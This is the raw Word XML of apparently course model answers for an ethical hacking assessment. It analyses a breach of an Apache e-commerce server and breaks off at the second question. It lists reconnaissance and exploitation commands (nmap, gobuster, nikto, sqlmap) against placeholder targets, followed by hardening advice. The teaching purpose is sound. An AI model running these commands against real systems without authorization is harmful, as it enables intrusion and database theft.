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2B88" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="160" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A3C6E"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>SIMATS ENGINEERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4051E363" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="6" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="170" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Assessment Tool 3 – Case Study: Model Answers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208D24C8" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="6" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="170" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Course Code: ITA14   |   Course Name: Ethical Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C8E1FF" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="6" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="10" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CO4: Implement network security testing methods by performing web server attacks, analyzing web application vulnerabilities, and assessing wireless network security using Kali Linux (BT4, BT5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7292EF91" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="6" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="170" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Total Marks: 100  (5 Questions × 20 Marks each)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FD7827" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="667" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="160" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4A50A6" wp14:editId="4004CE57">
                <wp:extent cx="5853121" cy="15240"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="10488" name="Group 10488"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5853121" cy="15240"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5853121" cy="15240"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="13" name="Shape 13"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5853121" cy="0"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5853121">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5853121" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="15240" cap="rnd">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="1A3C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88" style="width:460.876pt;height:1.2pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="58531,152">
                <v:shape id="Shape 13" style="position:absolute;width:58531;height:0;left:0;top:0;" coordsize="5853121,0" path="m0,0l5853121,0">
                  <v:stroke weight="1.2pt" endcap="round" joinstyle="miter" miterlimit="10" on="true" color="#1a3c6e"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF727FD" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="1A3C6E"/>
        <w:ind w:left="280" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Question 1: Web Server Attack on an E-Commerce Apache Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C5FB1D" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="150" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="155" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="B03030"/>
        </w:rPr>
        <w:t>(Marks: 20 — Understanding of Case: 5, Application of Concepts: 5, Analysis: 4, Solution Design: 4, Clarity: 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3F5815" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="252" w:line="286" w:lineRule="auto"/>
        <w:ind w:left="155" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Case Scenario:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> A mid-sized e-commerce company hosts its web application on an Apache server (Linux). Customers reported unauthorized transactions and abnormal account activity. Server logs show attempts to access hidden directories and injection of malicious scripts into input fields. The server runs an outdated version with known vulnerabilities and has no Web Application Firewall (WAF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12230196" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>1. Understanding of the Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640096CE" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="223"/>
        <w:ind w:left="160" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The incident indicates a multi-stage compromise rather than a single exploit. Three independent weaknesses combine to create the breach: (a) an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>outdated Apache/CMS stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with publicly known CVEs that were never patched, (b) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>weak or absent input validation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on forms, which allowed script/SQL payloads to be injected, and (c) the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>absence of a WAF</w:t>
      </w:r>
      <w:r>
        <w:t>, which removed the last line of defence that would normally have blocked malformed or malicious HTTP requests before they reached the application. The log evidence — probing of hidden directories and injected scripts — shows the attacker first mapped the application (reconnaissance) and then exploited discovered entry points (exploitation), which is the classic anatomy of a web server compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A64956" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>2. Attack Vectors Exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57581C51" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Outdated Software / Unpatched CVEs:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> An old Apache version (and possibly outdated PHP/CMS plug-ins) may carry known remote code execution, directory traversal, or information-disclosure vulnerabilities that are trivial to exploit once the version is fingerprinted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A43327B" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Directory / Hidden Path Enumeration:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Log entries show requests to hidden directories (e.g. /admin, /backup, /.git, /config) — a sign of forced browsing / brute-force directory discovery used to find administrative panels, backup files, or configuration files with credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF47778" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Input Validation Failure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unsanitized input fields (login, search, checkout) let attackers inject SQL meta-characters to bypass authentication or extract the customer and transaction database, explaining the unauthorized transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739807D0" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Input Validation Failure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Cross-Site Scripting (XSS):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Malicious script injection into input fields (e.g. product reviews, profile fields) lets the attacker hijack session cookies or redirect users to phishing pages, explaining the abnormal account activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A70B2DF" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Absence of WAF:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> With no WAF, none of the above payloads were filtered, rate-limited, or logged for early alerting, allowing the attack to progress undetected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408AD5AD" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="152"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Security Assessment Methodology using Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29341E53" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="91"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Reconnaissance (Information Gathering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7C0CC6" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nmap -sV -sC -p- &lt;target&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>) – identify open ports, running services and the exact Apache/PHP version banner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6502F1BA" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="76" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>WhatWeb / Wappalyzer (CLI)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – fingerprint the web stack, CMS, and plugin versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0058B1" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="57"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>theHarvester</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – gather email addresses, subdomains and public-facing assets for a wider attack-surface picture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51575C43" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="243"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dirb / Gobuster / DirBuster</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gobuster dir -u https://target -w wordlist.txt</w:t>
      </w:r>
      <w:r>
        <w:t>) – brute-force hidden directories and files such as /admin, /backup, /.env that matched the suspicious log entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7B47A4" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Vulnerability Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57781520" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nikto -h https://target</w:t>
      </w:r>
      <w:r>
        <w:t>) – scans the web server for outdated software, dangerous files, misconfigurations and known CVEs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CF4F75" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OpenVAS / Nessus (Greenbone)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – performs a full vulnerability assessment of the host OS, Apache service and exposed network ports, producing a CVSS-ranked report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10280563" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP ZAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – automated crawler + active scanner to detect injection points, missing security headers and outdated JS libraries used by the application front-end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A635E2F" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Exploitation (Controlled / Authorized Testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01212C43" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="58"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Metasploit Framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – matches the fingerprinted Apache/CMS version against known exploit modules to validate remote code execution or file-inclusion vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ABAB21" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sqlmap -u "https://target/page?id=1" --dbs --batch</w:t>
      </w:r>
      <w:r>
        <w:t>) – automates detection and exploitation of the SQL injection point found on the login/search form, confirming database access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D0F1F3" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Burp Suite (Repeater/Intruder)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – manually crafts and replays XSS payloads in the vulnerable input fields to confirm stored/reflected script execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDEB7F0" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="349"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – tests for weak/default admin credentials on discovered login panels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21436907" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="152"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>4. Layered (Defense-in-Depth) Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3220E82B" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Server Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33777D0F" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Patch Apache, PHP/CMS and all plugins to the latest stable versions; enable automatic security updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A056E36" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Disable directory listing, remove default/sample files, and restrict access to sensitive paths (/admin, /backup, /.git) via server configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D61C538" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Run the web server with least-privilege OS accounts and enable SELinux/AppArmor mandatory access control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD7A046" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Disable unused Apache modules and verbose server banners (ServerTokens Prod, ServerSignature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2CA0B4" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="247"/>
        <w:ind w:left="280" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Off).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741DFC38" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Secure Coding Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D61E096" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="76" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Use parameterized queries / prepared statements or an ORM to eliminate SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF1B83A" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Perform server-side input validation (whitelist approach) and contextual output encoding to prevent XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A356BD3" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="76" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Implement CSRF tokens and secure, HttpOnly, SameSite session cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E766713" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Adopt a secure SDLC with code review and static/dynamic application security testing (SAST/DAST) before each release.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D338C" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Network-Level Protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F4E36" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Deploy a Web Application Firewall (e.g. ModSecurity with OWASP Core Rule Set) to filter malicious requests in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B84AFA" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Place an IDS/IPS (e.g. Snort/Suricata) and configure rate-limiting to detect and throttle directory brute-forcing and injection attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A213F19" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Enforce HTTPS/TLS everywhere, HSTS, and strong security headers (CSP, X-Frame-Options, X-Content-Type-Options).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287E79AD" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Enable centralized logging and SIEM alerting so suspicious HTTP patterns trigger immediate investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170EA24A" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="009238FC">
      <w:pPr>
        <w:sectPr w:rsidR="009238FC">
          <w:headerReference w:type="even" r:id="rId7"/>
          <w:headerReference w:type="default" r:id="rId8"/>
          <w:headerReference w:type="first" r:id="rId9"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1331" w:right="1344" w:bottom="1524" w:left="1184" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2774AC74" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="275"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Question 2: SQL Injection and XSS in a Financial Services Web Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4208A120" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
